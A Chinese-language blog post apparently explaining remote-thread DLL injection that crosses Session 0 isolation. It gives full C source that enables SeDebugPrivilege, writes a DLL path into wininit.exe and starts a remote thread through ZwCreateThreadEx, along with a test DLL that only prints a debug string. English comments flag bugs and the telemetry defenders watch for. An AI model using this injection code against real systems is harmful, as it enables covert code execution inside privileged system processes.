  • [注入] 突破 SESSION 0 隔离的远线程注入

    与传统的CreateRemoteThread函数实现的远线程注入DLL的唯一区别在于,突破SESSION 0远线程注入技术是使用比CreateRemoteThread函数更为底层的ZwCreateThreadEx函数来创建远线程,而具体的远线程注入原理是相同的。

    #include<stdio.h>
    #include<windows.h>
    #include<Tlhelp32.h>
    #define NAME "wininit.exe"//被注入的进程
    #define PATH "C:\\Users\\john\\Desktop\\mydll.dll"//要注入的dll绝对路径
    
    BOOL GetProcessIDByName(char *,PDWORD);
    BOOL EnbalePrivileges(HANDLE,char*);
    // Function-pointer type for ntdll's ZwCreateThreadEx, which this program
    // resolves at run time with GetProcAddress (see main). The export is not
    // part of the public SDK, so the parameter list below is the page author's
    // reconstruction; the integer widths (DWORD for the size/flag arguments)
    // may not match every Windows version or bitness — TODO confirm before
    // relying on it. Defender note: resolving undocumented Nt/Zw thread
    // creation exports by name at run time is itself a common heuristic for
    // tooling that wants to avoid the documented CreateRemoteThread path.
    typedef DWORD (WINAPI *ZwCreateThreadEx )(PHANDLE ThreadHandle,
    									ACCESS_MASK DesiredAccess,
    									LPVOID ObjectAttributes,
    									HANDLE ProcessHandle,
    									LPTHREAD_START_ROUTINE lpStartAddress,
    									LPVOID lpParameter,BOOL CreateSuspended,
    									DWORD dwStackSize,
    									DWORD dw1,
    									DWORD dw2,
    									LPVOID pUnkown); 
    
    /*
     * Entry point: enables SeDebugPrivilege on the current process, looks up
     * the PID of the process named NAME, then makes that process load the DLL
     * at PATH by starting a remote thread whose start address is LoadLibrary
     * and whose single argument is the path written into the target.
     *
     * Defender note: every step here is the textbook remote-DLL-injection
     * telemetry chain — OpenProcess(PROCESS_ALL_ACCESS) on a system process,
     * VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and a
     * remote thread created via an ntdll export with LoadLibrary as its start
     * routine. Each of these is visible to kernel callbacks / ETW and is what
     * detection rules for this technique key on.
     *
     * Code-quality notes (left as-is): `void main()` is non-standard; `bool`
     * is used without <stdbool.h>, so this presumably builds as C++ — TODO
     * confirm; the result of EnbalePrivileges is ignored; no handle opened
     * below is ever closed.
     */
    void main()
    {
    	HANDLE hProcess = GetCurrentProcess();
    	char* pszPrivilegesName = "SeDebugPrivilege";
    	EnbalePrivileges(hProcess,pszPrivilegesName);   // return value not checked
    
    	DWORD pid;
    	// NOTE(review): GetProcessIDByName returns TRUE even when no process
    	// matched, in which case `pid` is read uninitialized below.
    	BOOL bRet = GetProcessIDByName(NAME,&pid);
    	if(bRet == FALSE)
    	{
    		return;
    	}
    	HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,NULL,pid);//open a handle to the target process
    	if(!hand)
    		return;
    	LPVOID lpaddress = VirtualAllocEx(hand,NULL,0x1000,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//reserve 0x1000 bytes in the target with read/write/execute permission
    	if(!lpaddress)
    		return;
    	// Copies the DLL path into the target. NOTE(review): PATH is a string
    	// literal much shorter than MAX_PATH, so MAX_PATH bytes are read past
    	// the end of the literal (out-of-bounds read in this process).
    	bool write = WriteProcessMemory(hand,lpaddress,PATH,MAX_PATH,NULL);//copy the path into the target
    	if(!write)
    		return;
    	// NOTE(review): neither LoadLibrary nor GetProcAddress is checked for
    	// NULL before the pointer is called.
    	ZwCreateThreadEx myZwCreateThreadEx = (ZwCreateThreadEx)GetProcAddress(LoadLibrary("ntdll.dll"),"ZwCreateThreadEx");
    	HANDLE hRemoteThread = NULL;
    	// Start a thread in the target at LoadLibrary with the written path as
    	// its argument. The return status and hRemoteThread are never examined
    	// or closed. PROCESS_ALL_ACCESS is a process access mask being passed
    	// where a thread access mask is expected.
    	myZwCreateThreadEx(&hRemoteThread,PROCESS_ALL_ACCESS,NULL,hand,(LPTHREAD_START_ROUTINE)LoadLibrary,lpaddress,0,0,0,0,NULL);//create the remote thread that loads the dll
    }
    
    /*
     * Scans a Toolhelp process snapshot and stores the PID of the last entry
     * whose image name equals `name` (exact, case-sensitive strcmp) in *pid.
     *
     * NOTE(review): always returns TRUE, even when the snapshot failed or no
     * entry matched; in the no-match case *pid is left untouched, so callers
     * must initialize it themselves. The snapshot handle is never closed, and
     * on CreateToolhelp32Snapshot failure the code prints an error but still
     * calls Process32First on INVALID_HANDLE_VALUE. strcmp on szExeFile
     * presumes a non-Unicode (char) build — TODO confirm.
     */
    BOOL GetProcessIDByName(char *name,PDWORD pid)
    {
    	PROCESSENTRY32 pe32 = {0};
    	pe32.dwSize = sizeof(PROCESSENTRY32);   // required by Process32First
    	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//take a snapshot of all processes
    	if (INVALID_HANDLE_VALUE == hProcessSnap)
    	{
    		printf("CreateToolhelp32Snapshot Error :%d",GetLastError());   // no early return: falls through with an invalid handle
    	}
    	BOOL Ret = Process32First(hProcessSnap,&pe32);//walk the snapshot
    	while(Ret)
    	{
    		if( !strcmp(pe32.szExeFile,name))
    		{
    			*pid = pe32.th32ProcessID;   // later matches overwrite earlier ones
    		}
    		Ret = Process32Next(hProcessSnap,&pe32);//advance to the next process entry
    	}
    	return TRUE;   // unconditional; does not indicate that a match was found
    }
    /*
     * Enables the named privilege on hProcess's primary token via
     * AdjustTokenPrivileges. (The function name is misspelled; kept as-is
     * because main calls it by this name.)
     *
     * Returns FALSE when OpenProcessToken, LookupPrivilegeValue or
     * AdjustTokenPrivileges fails. NOTE(review): there is no return statement
     * on the success path, so the returned value is undefined — the caller in
     * main ignores it, which is the only reason this goes unnoticed. hToken is
     * never closed. Defender note: enabling SeDebugPrivilege is a common
     * precursor to cross-process memory access and is audited via token
     * privilege-adjustment events.
     */
    BOOL EnbalePrivileges(HANDLE hProcess,char* pszPrivilegesName)
    {
    	HANDLE hToken = NULL;
    	LUID luidValue = {0};
    	TOKEN_PRIVILEGES tokenPrivileges = {0};
    	BOOL bRet = FALSE;
    	DWORD dwRet = OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES,&hToken);
    	printf("%d",GetLastError());   // debug print of the last error, emitted whether or not the call failed
    	if(false == dwRet)
    	{
    		return FALSE;
    	}
    	bRet = LookupPrivilegeValue(NULL,pszPrivilegesName,&luidValue);//resolve the privilege name to its LUID
    	if(false == bRet)
    	{
    		return FALSE;
    	}
    	tokenPrivileges.PrivilegeCount = 1;
    	tokenPrivileges.Privileges[0].Luid = luidValue;
    	tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    	bRet = AdjustTokenPrivileges(hToken,FALSE,&tokenPrivileges,0,NULL,NULL);
    	if(false == bRet)
    	{
    		return FALSE;
    	}
    	// AdjustTokenPrivileges can succeed while assigning nothing (the token
    	// lacks the privilege); GetLastError then reports ERROR_NOT_ALL_ASSIGNED.
    	// That case is not treated as a failure here — only the success case is
    	// reported, and the function then falls off the end without returning.
    	dwRet = GetLastError();
    	if(ERROR_SUCCESS == dwRet)
    	{
    		printf("SUCCESS!!");
    	}
    }
    
    
    


    dll 代码:

    #include<stdio.h>
    #include<windows.h>
    
    /*
     * DLL entry point for the payload: writes "success" to the debugger output
     * stream on every call, regardless of the reason code in `call`
     * (process/thread attach and detach all take the same path), and always
     * reports success. The first parameter is conventionally HINSTANCE; HANDLE
     * is used here. Defender note: OutputDebugString output is visible to an
     * attached debugger or a debug-output viewer, which makes this a
     * convenient indicator when analysing the sample.
     */
    BOOL WINAPI DllMain(HANDLE hmoudle,DWORD call,LPVOID lpreser)
    {
    	OutputDebugString("success");
    	return true;
    }
    
  • 原文地址:https://www.cnblogs.com/csnd/p/15613288.html